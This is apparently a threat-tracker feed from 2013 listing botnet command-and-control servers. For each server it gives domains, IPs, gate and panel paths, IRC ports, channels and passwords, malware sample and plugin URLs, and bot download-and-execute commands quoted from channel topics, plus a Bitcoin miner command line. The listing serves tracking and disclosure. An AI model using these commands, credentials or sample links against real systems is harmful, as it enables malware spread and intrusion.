Resolved fearboot.com to 198.20.67.10 Server: fearboot.com Gate file: /andro/image.php Visit http://fearboot.com/p.php or http://fearboot.com/phpinfo.php for information about the server. Hosting infos: http://whois.domaintools.com/198.20.67.10
x01bkr2.biz (snk asper mod irc botnet hosted by buyurl.net, alibabahost.com)
Resolved x01bkr2.biz to 94.242.237.128, 37.221.170.208 Server: x01bkr2.biz Port: 4723 Channel: #o.O Topic for #o.O is: .dl hxxp://www.mediafire.com/download.php?dqr1p0wz8tpz9tz | .dl hxxp://www.mediafire.com/download.php?uqqhg3equchc7bd Topic for #o.O set by SpliT at Sat Apr 27 17:57:29 2013 The skype spreader downloads messages from hxxp://waxortraxe.org/icon.jpg Alternate domains: zr0x1b9.biz xkzykxb.biz xeyaz.biz Hosting infos: http://whois.domaintools.com/94.242.237.128 Hosting infos: http://whois.domaintools.com/37.221.170.208 EDIT: snk is now desperatelyRead more...
199.168.136.116(Andromeda hosted in United States Scranton Volumedrive)
Panel:hxxp://199.168.136.116/andro/image.php Plugins: hxxp://199.168.136.116/andro/r.pack hxxp://199.168.136.116/andro/s.pack hxxp://199.168.136.116/andro/f.pack Andromeda path need user and login :hxxp://199.168.136.116/andro/ Other: http://199.168.136.116/andro/fg.php?id=1880376902 sample:hxxp://199.168.136.116/andro/and.exe hosting infos: http://whois.domaintools.com/199.168.136.116
firecrypt.net (Betabot http botnet hosted by alibabahost.com)
Resolved firecrypt.net to 37.221.165.124 Server: firecrypt.net Gate file: /BetaBot/order.php Alternate domains: rankedgaming.co iphone-giveaways.com Hosting infos: http://whois.domaintools.com/37.221.165.124
37.235.49.168 (Irc botnet hosted by edis.at)
Server: 37.235.49.168 Port: 443 Channel: #test5 Channel password: :godlol Topic for #test5 is: hacked by team whitehats Topic for #test5 set by Sabu at Tue Apr 23 15:14:29 2013 Example bot nick: zwin-JJNEXJ|1952| Opers: [Sabu] (ryan@dildos): ryan[Sabu] @#test5 @#opers @##fuckstamp #chats [Sabu] irc1.molten-wow.com :mw_customer_ircd[Sabu] is a Network Administrator[Sabu] is available for help.[Sabu] sysop[Sabu] idle 16:59:16,Read more...
kryptic.me (Andromeda http botnet hosted by alibabahost.com)
Resolved kryptic.me to 37.221.170.234 Server: kryptic.me Gate file: /jackson/gate.php Plugins Rootkit: hxxp://krytical.me/jackson/plugins/rk_666604bd.mod Alternate domain: krytical.me http://whois.domaintools.com/37.221.170.234
xlotxdxtorwfmvuzfuvtspel.com(zeroaccess hosted in United States San Antonio Rackspace Cloud Servers)
Domain used: xlotxdxtorwfmvuzfuvtspel.com 166.78.144.80 C:WINDOWSsystem32rsaenh.dll systemroot C:RECYCLER C:RECYCLERS-1-5-21-1547161642-507921405-839522115-1004 C:RECYCLERS-1-5-21-1547161642-507921405-839522115-1004$e0da97a6dd053ef45a7e44d9077fa7d5 L U @ n ACPI#PNP0303#2&da1a3ff&0 d2cd4bfe C:RECYCLERS-1-5-18 C:RECYCLERS-1-5-18$e0da97a6dd053ef45a7e44d9077fa7d5 C:DOCUME~1UserLOCALS~1Temp1 (1).exe PIPEwkssvc C: sample here hosting infos: http://whois.domaintools.com/166.78.144.80
moneybooster.info (Betabot http botnet hosted by leaseweb.com)
Resolved moneybooster.info to 95.211.211.90 Server: moneybooster.info Gate file: /bb/order.php Alternate domain: teeniecamchat.com Bitcoin mining info: pwr.exe” -a sha256 -o http://ukontseeme@live.com_13:12341234@pool.50btc.com:8332 -t 1 -T 83 -l yes Hosting infos: http://whois.domaintools.com/95.211.211.90
satanic-surfer.biz (Athena http botnet hosted by eternalhost.fr)
Resolved satanic-surfer.biz to 5.39.35.240 Server: satanic-surfer.biz Gate file: /gate.php hxxp://satanic-surfer.biz/panel.zip Hosting infos: http://whois.domaintools.com/5.39.35.240
ppppppp.rsmatcher.com (YABOT irc botnet hosted by China Shantou Shantou Tianyin Technology Co. Ltd)
Resolved ppppppp.rsmatcher.com to 121.14.212.125 Server: ppppppp.rsmatcher.com Port: 6971 Server password: laorosr Channel: #J Channel topic #J: .asc -S|.hxxp http://146.185.246.190/7081.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -aChannel: #dpi Channel topic #dpi: !dl hxxp://146.185.246.190/7384FUD-4-18.exe rsxjs.comRead more...